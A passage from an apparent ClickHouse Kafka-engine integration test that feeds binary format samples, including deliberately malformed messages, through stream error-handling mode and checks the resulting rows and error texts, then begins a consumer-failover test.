b'\x05\x01\x02\x69\x64\x05\x49\x6e\x74\x36\x34\x00\x00\x00\x00\x00\x00\x00\x00\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x06\x53\x74\x72\x69\x6e\x67\x03\x42\x41\x44\x04\x76\x61\x6c\x31\x06\x53\x74\x72\x69\x6e\x67\x02\x41\x4d\x04\x76\x61\x6c\x32\x07\x46\x6c\x6f\x61\x74\x33\x32\x00\x00\x00\x3f\x04\x76\x61\x6c\x33\x05\x55\x49\x6e\x74\x38\x01',
],
'expected':'''{"raw_message":"050102696405496E743634000000000000000007626C6F636B4E6F06537472696E67034241440476616C3106537472696E6702414D0476616C3207466C6F617433320000003F0476616C330555496E743801","error":"Cannot convert: String to UInt16"}''',
'printable':False,
},
'RowBinary': {
'data_sample': [
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01',
b'\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x09\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01',
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01',
# broken message
b'\x00\x00\x00\x00\x00\x00\x00\x00\x03\x42\x41\x44\x02\x41\x4d\x00\x00\x00\x3f\x01',
],
'expected':'{"raw_message":"00000000000000000342414402414D0000003F01","error":"Cannot read all data. Bytes read: 9. Bytes expected: 65.: (at row 1)\\n"}',
'printable':False,
},
'RowBinaryWithNamesAndTypes': {
'data_sample': [
b'\x05\x02\x69\x64\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x04\x76\x61\x6c\x31\x04\x76\x61\x6c\x32\x04\x76\x61\x6c\x33\x05\x49\x6e\x74\x36\x34\x06\x55\x49\x6e\x74\x31\x36\x06\x53\x74\x72\x69\x6e\x67\x07\x46\x6c\x6f\x61\x74\x33\x32\x05\x55\x49\x6e\x74\x38\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01',
b'\x05\x02\x69\x64\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x04\x76\x61\x6c\x31\x04\x76\x61\x6c\x32\x04\x76\x61\x6c\x33\x05\x49\x6e\x74\x36\x34\x06\x55\x49\x6e\x74\x31\x36\x06\x53\x74\x72\x69\x6e\x67\x07\x46\x6c\x6f\x61\x74\x33\x32\x05\x55\x49\x6e\x74\x38\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x09\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01',
b'\x05\x02\x69\x64\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x04\x76\x61\x6c\x31\x04\x76\x61\x6c\x32\x04\x76\x61\x6c\x33\x05\x49\x6e\x74\x36\x34\x06\x55\x49\x6e\x74\x31\x36\x06\x53\x74\x72\x69\x6e\x67\x07\x46\x6c\x6f\x61\x74\x33\x32\x05\x55\x49\x6e\x74\x38\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01',
# broken message
b'\x05\x02\x69\x64\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x04\x76\x61\x6c\x31\x04\x76\x61\x6c\x32\x04\x76\x61\x6c\x33\x05\x49\x6e\x74\x36\x34\x06\x53\x74\x72\x69\x6e\x67\x06\x53\x74\x72\x69\x6e\x67\x07\x46\x6c\x6f\x61\x74\x33\x32\x05\x55\x49\x6e\x74\x38\x00\x00\x00\x00\x00\x00\x00\x00\x03\x42\x41\x44\x02\x41\x4d\x00\x00\x00\x3f\x01',
],
'expected':'{"raw_message":"0502696407626C6F636B4E6F0476616C310476616C320476616C3305496E74363406537472696E6706537472696E6707466C6F617433320555496E743800000000000000000342414402414D0000003F01","error":"Type of \'blockNo\' must be UInt16, not String"}',
'printable':False,
},
'ORC': {
'data_sample': [
b'\x4f\x52\x43\x11\x00\x00\x0a\x06\x12\x04\x08\x01\x50\x00\x2b\x00\x00\x0a\x13\x0a\x03\x00\x00\x00\x12\x0c\x08\x01\x12\x06\x08\x00\x10\x00\x18\x00\x50\x00\x30\x00\x00\xe3\x12\xe7\x62\x65\x00\x01\x21\x3e\x0e\x46\x25\x0e\x2e\x46\x03\x21\x46\x03\x09\xa6\x00\x06\x00\x32\x00\x00\xe3\x92\xe4\x62\x65\x00\x01\x21\x01\x0e\x46\x25\x2e\x2e\x26\x47\x5f\x21\x20\x96\x60\x09\x60\x00\x00\x36\x00\x00\xe3\x92\xe1\x62\x65\x00\x01\x21\x61\x0e\x46\x23\x5e\x2e\x46\x03\x21\x66\x03\x3d\x53\x29\x10\x11\xc0\x00\x00\x2b\x00\x00\x0a\x13\x0a\x03\x00\x00\x00\x12\x0c\x08\x01\x12\x06\x08\x02\x10\x02\x18\x02\x50\x00\x05\x00\x00\xff\x00\x03\x00\x00\x30\x07\x00\x00\x40\x00\x80\x05\x00\x00\x41\x4d\x07\x00\x00\x42\x00\x80\x03\x00\x00\x0a\x07\x00\x00\x42\x00\x80\x05\x00\x00\xff\x01\x88\x00\x00\x4d\xca\xc1\x0a\x80\x30\x0c\x03\xd0\x2e\x6b\xcb\x98\x17\xf1\x14\x50\xfc\xff\xcf\xb4\x66\x1e\x3c\x84\x47\x9a\xce\x1c\xb9\x1b\xb7\xf9\xda\x48\x09\x9e\xb2\xf3\x92\xce\x5b\x86\xf6\x56\x7f\x21\x41\x2f\x51\xa6\x7a\xd7\x1d\xe5\xea\xae\x3d\xca\xd5\x83\x71\x60\xd8\x17\xfc\x62\x0f\xa8\x00\x00\xe3\x4a\xe6\x62\xe1\x60\x0c\x60\xe0\xe2\xe3\x60\x14\x62\xe3\x60\x10\x60\x90\x60\x08\x60\x88\x60\xe5\x12\xe0\x60\x54\xe2\xe0\x62\x34\x10\x62\x34\x90\x60\x02\x8a\x70\x71\x09\x01\x45\xb8\xb8\x98\x1c\x7d\x85\x80\x58\x82\x05\x28\xc6\xcd\x25\xca\xc1\x68\xc4\x0b\x52\xc5\x6c\xa0\x67\x2a\x05\x22\xc0\x4a\x21\x86\x31\x09\x30\x81\xb5\xb2\x02\x00\x36\x01\x00\x25\x8c\xbd\x0a\xc2\x30\x14\x85\x73\x6f\x92\xf6\x92\x6a\x09\x01\x21\x64\x92\x4e\x75\x91\x58\x71\xc9\x64\x27\x5d\x2c\x1d\x5d\xfd\x59\xc4\x42\x37\x5f\xc0\x17\xe8\x23\x9b\xc6\xe1\x3b\x70\x0f\xdf\xb9\xc4\xf5\x17\x5d\x41\x5c\x4f\x60\x37\xeb\x53\x0d\x55\x4d\x0b\x23\x01\xb9\x90\x2e\xbf\x0f\xe3\xe3\xdd\x8d\x0e\x5f\x4f\x27\x3e\xb7\x61\x97\xb2\x49\xb9\xaf\x90\x20\x92\x27\x32\x2a\x6b\xf4\xf3\x0d\x1e\x82\x20\xe8\x59\x28\x09\x4c\x46\x4c\x33\xcb\x7a\x76\x95\x41\x47\x9f\x14\x78\x03\xde\x62\x6c\x54\x30\xb1\x51\x0a\xdb\x8b\x89\x58\x11\xbb\x22\xac\x08\x9a\xe5\x6c\x71\xbf\x3d\xb8\x39\x92\xfa\x7f\x86\x1a\xd3\x54\x
1e\xa7\xee\xcc\x7e\x08\x9e\x01\x10\x01\x18\x80\x80\x10\x22\x02\x00\x0c\x28\x57\x30\x06\x82\xf4\x03\x03\x4f\x52\x43\x18',
b'\x4f\x52\x43\x11\x00\x00\x0a\x06\x12\x04\x08\x0f\x50\x00\x2b\x00\x00\x0a\x13\x0a\x03\x00\x00\x00\x12\x0c\x08\x0f\x12\x06\x08\x00\x10\x00\x18\x00\x50\x00\x30\x00\x00\xe3\x12\xe7\x62\x65\x00\x01\x21\x3e\x0e\x7e\x25\x0e\x2e\x46\x43\x21\x46\x4b\x09\xad\x00\x06\x00\x33\x00\x00\x0a\x17\x0a\x03\x00\x00\x00\x12\x10\x08\x0f\x22\x0a\x0a\x02\x41\x4d\x12\x02\x41\x4d\x18\x3c\x50\x00\x3a\x00\x00\xe3\x92\xe1\x62\x65\x00\x01\x21\x61\x0e\x7e\x23\x5e\x2e\x46\x03\x21\x66\x03\x3d\x53\x29\x66\x73\x3d\xd3\x00\x06\x00\x2b\x00\x00\x0a\x13\x0a\x03\x00\x00\x00\x12\x0c\x08\x0f\x12\x06\x08\x02\x10\x02\x18\x1e\x50\x00\x05\x00\x00\x0c\x00\x2b\x00\x00\x31\x32\x33\x34\x35\x36\x37\x38\x39\x31\x30\x31\x31\x31\x32\x31\x33\x31\x34\x31\x35\x09\x00\x00\x06\x01\x03\x02\x09\x00\x00\xc0\x0e\x00\x00\x07\x00\x00\x42\x00\x80\x05\x00\x00\x41\x4d\x0a\x00\x00\xe3\xe2\x42\x01\x00\x09\x00\x00\xc0\x0e\x02\x00\x05\x00\x00\x0c\x01\x94\x00\x00\x2d\xca\xc1\x0e\x80\x30\x08\x03\xd0\xc1\x60\x2e\xf3\x62\x76\x6a\xe2\x0e\xfe\xff\x57\x5a\x3b\x0f\xe4\x51\xe8\x68\xbd\x5d\x05\xe7\xf8\x34\x40\x3a\x6e\x59\xb1\x64\xe0\x91\xa9\xbf\xb1\x97\xd2\x95\x9d\x1e\xca\x55\x3a\x6d\xb4\xd2\xdd\x0b\x74\x9a\x74\xf7\x12\x39\xbd\x97\x7f\x7c\x06\xbb\xa6\x8d\x97\x17\xb4\x00\x00\xe3\x4a\xe6\x62\xe1\xe0\x0f\x60\xe0\xe2\xe3\xe0\x17\x62\xe3\x60\x10\x60\x90\x60\x08\x60\x88\x60\xe5\x12\xe0\xe0\x57\xe2\xe0\x62\x34\x14\x62\xb4\x94\xd0\x02\x8a\xc8\x73\x09\x01\x45\xb8\xb8\x98\x1c\x7d\x85\x80\x58\xc2\x06\x28\x26\xc4\x25\xca\xc1\x6f\xc4\xcb\xc5\x68\x20\xc4\x6c\xa0\x67\x2a\xc5\x6c\xae\x67\x0a\x14\xe6\x87\x1a\xc6\x24\xc0\x24\x21\x07\x32\x0c\x00\x4a\x01\x00\xe3\x60\x16\x58\xc3\x24\xc5\xcd\xc1\x2c\x30\x89\x51\xc2\x4b\xc1\x57\x83\x5f\x49\x83\x83\x47\x88\x95\x91\x89\x99\x85\x55\x8a\x3d\x29\x27\x3f\x39\xdb\x2f\x5f\x8a\x29\x33\x45\x8a\xa5\x2c\x31\xc7\x10\x4c\x1a\x81\x49\x63\x25\x26\x0e\x46\x20\x66\x07\x63\x36\x0e\x3e\x0d\x26\x03\x10\x9f\xd1\x80\xdf\x8a\x85\x83\x3f\x80\xc1\x8a\x8f\x83\x5f\x88\x8d\x83\x41\x80\x41\x82\x21\x80\x21\x82\xd5\x4a\x80\x83\x5f\x89\x83\x8b\xd1\x
50\x88\xd1\x52\x42\x0b\x28\x22\x6f\x25\x04\x14\xe1\xe2\x62\x72\xf4\x15\x02\x62\x09\x1b\xa0\x98\x90\x95\x28\x07\xbf\x11\x2f\x17\xa3\x81\x10\xb3\x81\x9e\xa9\x14\xb3\xb9\x9e\x29\x50\x98\x1f\x6a\x18\x93\x00\x93\x84\x1c\xc8\x30\x87\x09\x7e\x1e\x0c\x00\x08\xa8\x01\x10\x01\x18\x80\x80\x10\x22\x02\x00\x0c\x28\x5d\x30\x06\x82\xf4\x03\x03\x4f\x52\x43\x18',
b'\x4f\x52\x43\x11\x00\x00\x0a\x06\x12\x04\x08\x01\x50\x00\x2b\x00\x00\x0a\x13\x0a\x03\x00\x00\x00\x12\x0c\x08\x01\x12\x06\x08\x00\x10\x00\x18\x00\x50\x00\x30\x00\x00\xe3\x12\xe7\x62\x65\x00\x01\x21\x3e\x0e\x46\x25\x0e\x2e\x46\x03\x21\x46\x03\x09\xa6\x00\x06\x00\x32\x00\x00\xe3\x92\xe4\x62\x65\x00\x01\x21\x01\x0e\x46\x25\x2e\x2e\x26\x47\x5f\x21\x20\x96\x60\x09\x60\x00\x00\x36\x00\x00\xe3\x92\xe1\x62\x65\x00\x01\x21\x61\x0e\x46\x23\x5e\x2e\x46\x03\x21\x66\x03\x3d\x53\x29\x10\x11\xc0\x00\x00\x2b\x00\x00\x0a\x13\x0a\x03\x00\x00\x00\x12\x0c\x08\x01\x12\x06\x08\x02\x10\x02\x18\x02\x50\x00\x05\x00\x00\xff\x00\x03\x00\x00\x30\x07\x00\x00\x40\x00\x80\x05\x00\x00\x41\x4d\x07\x00\x00\x42\x00\x80\x03\x00\x00\x0a\x07\x00\x00\x42\x00\x80\x05\x00\x00\xff\x01\x88\x00\x00\x4d\xca\xc1\x0a\x80\x30\x0c\x03\xd0\x2e\x6b\xcb\x98\x17\xf1\x14\x50\xfc\xff\xcf\xb4\x66\x1e\x3c\x84\x47\x9a\xce\x1c\xb9\x1b\xb7\xf9\xda\x48\x09\x9e\xb2\xf3\x92\xce\x5b\x86\xf6\x56\x7f\x21\x41\x2f\x51\xa6\x7a\xd7\x1d\xe5\xea\xae\x3d\xca\xd5\x83\x71\x60\xd8\x17\xfc\x62\x0f\xa8\x00\x00\xe3\x4a\xe6\x62\xe1\x60\x0c\x60\xe0\xe2\xe3\x60\x14\x62\xe3\x60\x10\x60\x90\x60\x08\x60\x88\x60\xe5\x12\xe0\x60\x54\xe2\xe0\x62\x34\x10\x62\x34\x90\x60\x02\x8a\x70\x71\x09\x01\x45\xb8\xb8\x98\x1c\x7d\x85\x80\x58\x82\x05\x28\xc6\xcd\x25\xca\xc1\x68\xc4\x0b\x52\xc5\x6c\xa0\x67\x2a\x05\x22\xc0\x4a\x21\x86\x31\x09\x30\x81\xb5\xb2\x02\x00\x36\x01\x00\x25\x8c\xbd\x0a\xc2\x30\x14\x85\x73\x6f\x92\xf6\x92\x6a\x09\x01\x21\x64\x92\x4e\x75\x91\x58\x71\xc9\x64\x27\x5d\x2c\x1d\x5d\xfd\x59\xc4\x42\x37\x5f\xc0\x17\xe8\x23\x9b\xc6\xe1\x3b\x70\x0f\xdf\xb9\xc4\xf5\x17\x5d\x41\x5c\x4f\x60\x37\xeb\x53\x0d\x55\x4d\x0b\x23\x01\xb9\x90\x2e\xbf\x0f\xe3\xe3\xdd\x8d\x0e\x5f\x4f\x27\x3e\xb7\x61\x97\xb2\x49\xb9\xaf\x90\x20\x92\x27\x32\x2a\x6b\xf4\xf3\x0d\x1e\x82\x20\xe8\x59\x28\x09\x4c\x46\x4c\x33\xcb\x7a\x76\x95\x41\x47\x9f\x14\x78\x03\xde\x62\x6c\x54\x30\xb1\x51\x0a\xdb\x8b\x89\x58\x11\xbb\x22\xac\x08\x9a\xe5\x6c\x71\xbf\x3d\xb8\x39\x92\xfa\x7f\x86\x1a\xd3\x54\x
1e\xa7\xee\xcc\x7e\x08\x9e\x01\x10\x01\x18\x80\x80\x10\x22\x02\x00\x0c\x28\x57\x30\x06\x82\xf4\x03\x03\x4f\x52\x43\x18',
# broken message
b'\x4f\x52\x43\x0a\x0b\x0a\x03\x00\x00\x00\x12\x04\x08\x01\x50\x00\x0a\x15\x0a\x05\x00\x00\x00\x00\x00\x12\x0c\x08\x01\x12\x06\x08\x00\x10\x00\x18\x00\x50\x00\x0a\x12\x0a\x06\x00\x00\x00\x00\x00\x00\x12\x08\x08\x01\x42\x02\x08\x06\x50\x00\x0a\x12\x0a\x06\x00\x00\x00\x00\x00\x00\x12\x08\x08\x01\x42\x02\x08\x04\x50\x00\x0a\x29\x0a\x04\x00\x00\x00\x00\x12\x21\x08\x01\x1a\x1b\x09\x00\x00\x00\x00\x00\x00\xe0\x3f\x11\x00\x00\x00\x00\x00\x00\xe0\x3f\x19\x00\x00\x00\x00\x00\x00\xe0\x3f\x50\x00\x0a\x15\x0a\x05\x00\x00\x00\x00\x00\x12\x0c\x08\x01\x12\x06\x08\x02\x10\x02\x18\x02\x50\x00\xff\x80\xff\x80\xff\x00\xff\x80\xff\x03\x42\x41\x44\xff\x80\xff\x02\x41\x4d\xff\x80\x00\x00\x00\x3f\xff\x80\xff\x01\x0a\x06\x08\x06\x10\x00\x18\x0d\x0a\x06\x08\x06\x10\x01\x18\x17\x0a\x06\x08\x06\x10\x02\x18\x14\x0a\x06\x08\x06\x10\x03\x18\x14\x0a\x06\x08\x06\x10\x04\x18\x2b\x0a\x06\x08\x06\x10\x05\x18\x17\x0a\x06\x08\x00\x10\x00\x18\x02\x0a\x06\x08\x00\x10\x01\x18\x02\x0a\x06\x08\x01\x10\x01\x18\x02\x0a\x06\x08\x00\x10\x02\x18\x02\x0a\x06\x08\x02\x10\x02\x18\x02\x0a\x06\x08\x01\x10\x02\x18\x03\x0a\x06\x08\x00\x10\x03\x18\x02\x0a\x06\x08\x02\x10\x03\x18\x02\x0a\x06\x08\x01\x10\x03\x18\x02\x0a\x06\x08\x00\x10\x04\x18\x02\x0a\x06\x08\x01\x10\x04\x18\x04\x0a\x06\x08\x00\x10\x05\x18\x02\x0a\x06\x08\x01\x10\x05\x18\x02\x12\x04\x08\x00\x10\x00\x12\x04\x08\x00\x10\x00\x12\x04\x08\x00\x10\x00\x12\x04\x08\x00\x10\x00\x12\x04\x08\x00\x10\x00\x12\x04\x08\x00\x10\x00\x1a\x03\x47\x4d\x54\x0a\x59\x0a\x04\x08\x01\x50\x00\x0a\x0c\x08\x01\x12\x06\x08\x00\x10\x00\x18\x00\x50\x00\x0a\x08\x08\x01\x42\x02\x08\x06\x50\x00\x0a\x08\x08\x01\x42\x02\x08\x04\x50\x00\x0a\x21\x08\x01\x1a\x1b\x09\x00\x00\x00\x00\x00\x00\xe0\x3f\x11\x00\x00\x00\x00\x00\x00\xe0\x3f\x19\x00\x00\x00\x00\x00\x00\xe0\x3f\x50\x00\x0a\x0c\x08\x01\x12\x06\x08\x02\x10\x02\x18\x02\x50\x00\x08\x03\x10\xec\x02\x1a\x0c\x08\x03\x10\x8e\x01\x18\x1d\x20\xc1\x01\x28\x01\x22\x2e\x08\x0c\x12\x05\x01\x02\x03\x04\x05\x1a\x02\x69\x64\x1a\x07\x62\x6c\x6f\x63\x6b\x
4e\x6f\x1a\x04\x76\x61\x6c\x31\x1a\x04\x76\x61\x6c\x32\x1a\x04\x76\x61\x6c\x33\x20\x00\x28\x00\x30\x00\x22\x08\x08\x04\x20\x00\x28\x00\x30\x00\x22\x08\x08\x08\x20\x00\x28\x00\x30\x00\x22\x08\x08\x08\x20\x00\x28\x00\x30\x00\x22\x08\x08\x05\x20\x00\x28\x00\x30\x00\x22\x08\x08\x01\x20\x00\x28\x00\x30\x00\x30\x01\x3a\x04\x08\x01\x50\x00\x3a\x0c\x08\x01\x12\x06\x08\x00\x10\x00\x18\x00\x50\x00\x3a\x08\x08\x01\x42\x02\x08\x06\x50\x00\x3a\x08\x08\x01\x42\x02\x08\x04\x50\x00\x3a\x21\x08\x01\x1a\x1b\x09\x00\x00\x00\x00\x00\x00\xe0\x3f\x11\x00\x00\x00\x00\x00\x00\xe0\x3f\x19\x00\x00\x00\x00\x00\x00\xe0\x3f\x50\x00\x3a\x0c\x08\x01\x12\x06\x08\x02\x10\x02\x18\x02\x50\x00\x40\x90\x4e\x48\x01\x08\xd5\x01\x10\x00\x18\x80\x80\x04\x22\x02\x00\x0b\x28\x5b\x30\x06\x82\xf4\x03\x03\x4f\x52\x43\x18',
],
'expected':r'''{"raw_message":"4F52430A0B0A030000001204080150000A150A050000000000120C0801120608001000180050000A120A06000000000000120808014202080650000A120A06000000000000120808014202080450000A290A0400000000122108011A1B09000000000000E03F11000000000000E03F19000000000000E03F50000A150A050000000000120C080112060802100218025000FF80FF80FF00FF80FF03424144FF80FF02414DFF800000003FFF80FF010A0608061000180D0A060806100118170A060806100218140A060806100318140A0608061004182B0A060806100518170A060800100018020A060800100118020A060801100118020A060800100218020A060802100218020A060801100218030A060800100318020A060802100318020A060801100318020A060800100418020A060801100418040A060800100518020A060801100518021204080010001204080010001204080010001204080010001204080010001204080010001A03474D540A590A04080150000A0C0801120608001000180050000A0808014202080650000A0808014202080450000A2108011A1B09000000000000E03F11000000000000E03F19000000000000E03F50000A0C080112060802100218025000080310EC021A0C0803108E01181D20C1012801222E080C120501020304051A0269641A07626C6F636B4E6F1A0476616C311A0476616C321A0476616C33200028003000220808042000280030002208080820002800300022080808200028003000220808052000280030002208080120002800300030013A04080150003A0C0801120608001000180050003A0808014202080650003A0808014202080450003A2108011A1B09000000000000E03F11000000000000E03F19000000000000E03F50003A0C08011206080210021802500040904E480108D5011000188080042202000B285B300682F403034F524318","error":"Cannot parse string 'BAD' as UInt16: syntax error at begin of string. Note: there are toUInt16OrZero and toUInt16OrNull functions, which returns zero\/NULL instead of throwing exception."}''',
'printable':False,
}
}
topic_name_prefix = 'format_tests_4_stream_'
for format_name, format_opts in list(all_formats.items()):
logging.debug(f'Set up {format_name}')
topic_name = f"{topic_name_prefix}{format_name}"
data_sample = format_opts['data_sample']
data_prefix = []
raw_message = '_raw_message'
# prepend empty value when supported
if format_opts.get('supports_empty_value', False):
data_prefix = data_prefix + ['']
if format_opts.get('printable', False) == False:
raw_message = 'hex(_raw_message)'
kafka_produce(kafka_cluster, topic_name, data_prefix + data_sample)
instance.query('''
DROP TABLE IF EXISTS test.kafka_{format_name};
CREATE TABLE test.kafka_{format_name} (
id Int64,
blockNo UInt16,
val1 String,
val2 Float32,
val3 UInt8
) ENGINE = Kafka()
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = '{topic_name}',
kafka_group_name = '{topic_name}',
kafka_format = '{format_name}',
kafka_handle_error_mode = 'stream',
kafka_flush_interval_ms = 1000 {extra_settings};
DROP TABLE IF EXISTS test.kafka_data_{format_name}_mv;
CREATE MATERIALIZED VIEW test.kafka_data_{format_name}_mv Engine=Log AS
SELECT *, _topic, _partition, _offset FROM test.kafka_{format_name}
WHERE length(_error) = 0;
DROP TABLE IF EXISTS test.kafka_errors_{format_name}_mv;
CREATE MATERIALIZED VIEW test.kafka_errors_{format_name}_mv Engine=Log AS
SELECT {raw_message} as raw_message, _error as error, _topic as topic, _partition as partition, _offset as offset FROM test.kafka_{format_name}
WHERE length(_error) > 0;
'''.format(topic_name=topic_name, format_name=format_name, raw_message=raw_message,
extra_settings=format_opts.get('extra_settings') or ''))
for format_name, format_opts in list(all_formats.items()):
logging.debug('Checking {format_name}')
topic_name = f"{topic_name_prefix}{format_name}"
# shift offsets by 1 if format supports empty value
offsets = [1, 2, 3] if format_opts.get('supports_empty_value', False) else [0, 1, 2]
result = instance.query('SELECT * FROM test.kafka_data_{format_name}_mv;'.format(format_name=format_name))
expected = '''\
0 0 AM 0.5 1 {topic_name} 0 {offset_0}
1 0 AM 0.5 1 {topic_name} 0 {offset_1}
2 0 AM 0.5 1 {topic_name} 0 {offset_1}
3 0 AM 0.5 1 {topic_name} 0 {offset_1}
4 0 AM 0.5 1 {topic_name} 0 {offset_1}
5 0 AM 0.5 1 {topic_name} 0 {offset_1}
6 0 AM 0.5 1 {topic_name} 0 {offset_1}
7 0 AM 0.5 1 {topic_name} 0 {offset_1}
8 0 AM 0.5 1 {topic_name} 0 {offset_1}
9 0 AM 0.5 1 {topic_name} 0 {offset_1}
10 0 AM 0.5 1 {topic_name} 0 {offset_1}
11 0 AM 0.5 1 {topic_name} 0 {offset_1}
12 0 AM 0.5 1 {topic_name} 0 {offset_1}
13 0 AM 0.5 1 {topic_name} 0 {offset_1}
14 0 AM 0.5 1 {topic_name} 0 {offset_1}
15 0 AM 0.5 1 {topic_name} 0 {offset_1}
0 0 AM 0.5 1 {topic_name} 0 {offset_2}
'''.format(topic_name=topic_name, offset_0=offsets[0], offset_1=offsets[1], offset_2=offsets[2])
# print(('Checking result\n {result} \n expected \n {expected}\n'.format(result=str(result), expected=str(expected))))
assert TSV(result) == TSV(expected), 'Proper result for format: {}'.format(format_name)
errors_result = ast.literal_eval(instance.query('SELECT raw_message, error FROM test.kafka_errors_{format_name}_mv format JSONEachRow'.format(format_name=format_name)))
errors_expected = ast.literal_eval(format_opts['expected'])
# print(errors_result.strip())
# print(errors_expected.strip())
assert errors_result['raw_message'] == errors_expected['raw_message'], 'Proper raw_message for format: {}'.format(format_name)
# Errors text can change, just checking prefixes
assert errors_expected['error'] in errors_result['error'], 'Proper error for format: {}'.format(format_name)
kafka_delete_topic(admin_client, topic_name)
def wait_for_new_data(table_name, prev_count=0, max_retries=120):
    """Poll ``table_name`` until its row count exceeds ``prev_count``.

    Polls every 0.5 s, printing each observed count, and returns the new
    count.  Raises after ``max_retries`` unsuccessful polls.
    """
    for _ in range(max_retries + 1):
        current_count = int(instance.query("SELECT count() FROM {}".format(table_name)))
        print(current_count)
        if current_count > prev_count:
            return current_count
        time.sleep(0.5)
    raise Exception("No new data :(")
def test_kafka_consumer_failover(kafka_cluster):
    """Consumption must fail over between three Kafka tables sharing one group.

    The topic has 2 partitions, so at most two of the three tables consume at
    any moment; tables are detached/attached one by one while messages keep
    arriving, and test.destination must gain new rows after every step.
    """
    # for backporting:
    # admin_client = KafkaAdminClient(bootstrap_servers="localhost:9092")
    admin_client = KafkaAdminClient(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))

    topic_name = "kafka_consumer_failover"
    kafka_create_topic(admin_client, topic_name, num_partitions=2)

    # NOTE: test.kafka3 was previously created without a preceding DROP, so a
    # leftover table from an earlier run would make CREATE TABLE fail.
    instance.query('''
        DROP TABLE IF EXISTS test.kafka;
        DROP TABLE IF EXISTS test.kafka2;
        DROP TABLE IF EXISTS test.kafka3;

        CREATE TABLE test.kafka (key UInt64, value UInt64)
            ENGINE = Kafka
            SETTINGS kafka_broker_list = 'kafka1:19092',
                     kafka_topic_list = 'kafka_consumer_failover',
                     kafka_group_name = 'kafka_consumer_failover_group',
                     kafka_format = 'JSONEachRow',
                     kafka_max_block_size = 1,
                     kafka_poll_timeout_ms = 200;

        CREATE TABLE test.kafka2 (key UInt64, value UInt64)
            ENGINE = Kafka
            SETTINGS kafka_broker_list = 'kafka1:19092',
                     kafka_topic_list = 'kafka_consumer_failover',
                     kafka_group_name = 'kafka_consumer_failover_group',
                     kafka_format = 'JSONEachRow',
                     kafka_max_block_size = 1,
                     kafka_poll_timeout_ms = 200;

        CREATE TABLE test.kafka3 (key UInt64, value UInt64)
            ENGINE = Kafka
            SETTINGS kafka_broker_list = 'kafka1:19092',
                     kafka_topic_list = 'kafka_consumer_failover',
                     kafka_group_name = 'kafka_consumer_failover_group',
                     kafka_format = 'JSONEachRow',
                     kafka_max_block_size = 1,
                     kafka_poll_timeout_ms = 200;

        CREATE TABLE test.destination (
            key UInt64,
            value UInt64,
            _consumed_by LowCardinality(String)
        )
        ENGINE = MergeTree()
        ORDER BY key;

